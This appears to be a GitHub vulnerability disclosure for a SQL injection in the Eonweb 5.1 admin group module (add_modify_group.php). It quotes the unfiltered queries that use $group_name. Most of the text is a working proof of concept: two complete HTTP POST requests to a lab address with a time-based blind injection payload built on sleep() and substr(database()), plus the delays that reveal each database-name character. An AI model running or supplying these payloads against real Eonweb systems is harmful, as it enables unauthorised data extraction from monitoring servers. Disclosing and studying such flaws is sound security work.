-
Notifications
You must be signed in to change notification settings - Fork 1
/
Eonweb_module_admin_group_add_modify_group.php SQLi
59 lines (46 loc) · 2.4 KB
/
Eonweb_module_admin_group_add_modify_group.php SQLi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
Eonweb_module_admin_group_add_modify_group.php function insert_group has SQL injection vulnerability
Powered by Shaojie Jiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/admin_group/add_modify_group.php Line 179
$group_exist=mysqli_result(sqlrequest("$database_eonweb","SELECT count('group_name') from groups where group_name='$group_name';"),0);
Line 189
$group_ldap=sqlrequest("$database_eonweb","SELECT dn from ldap_groups_extended where group_name='$group_name';");
$group_name has not been filtered to cause SQL injection vulnerability
EXP:
POST https://192.168.242.128/module/admin_group/add_modify_group.php HTTP/1.1
Host: 192.168.242.128
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Referer: https://192.168.242.128/module/admin_group/add_modify_group.php
Cookie: session_id=602820757; user_name=admin; user_id=1; user_limitation=0; group_id=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
group_id=&group_name=jsj' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23&group_descr=jsj123&tab_1=1&tab_2=1&tab_3=1&tab_4=1&tab_5=1&tab_6=1&tab_7=1&add=add
The page will be delayed for 10 seconds
-------------------------------------------
if you send :
POST https://192.168.242.128/module/admin_group/add_modify_group.php HTTP/1.1
Host: 192.168.242.128
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Referer: https://192.168.242.128/module/admin_group/add_modify_group.php
Cookie: session_id=602820757; user_name=admin; user_id=1; user_limitation=0; group_id=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
group_id=&group_name=jsj' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23&group_descr=jsj123&tab_1=1&tab_2=1&tab_3=1&tab_4=1&tab_5=1&tab_6=1&tab_7=1&add=add
The page will be delayed for 0 seconds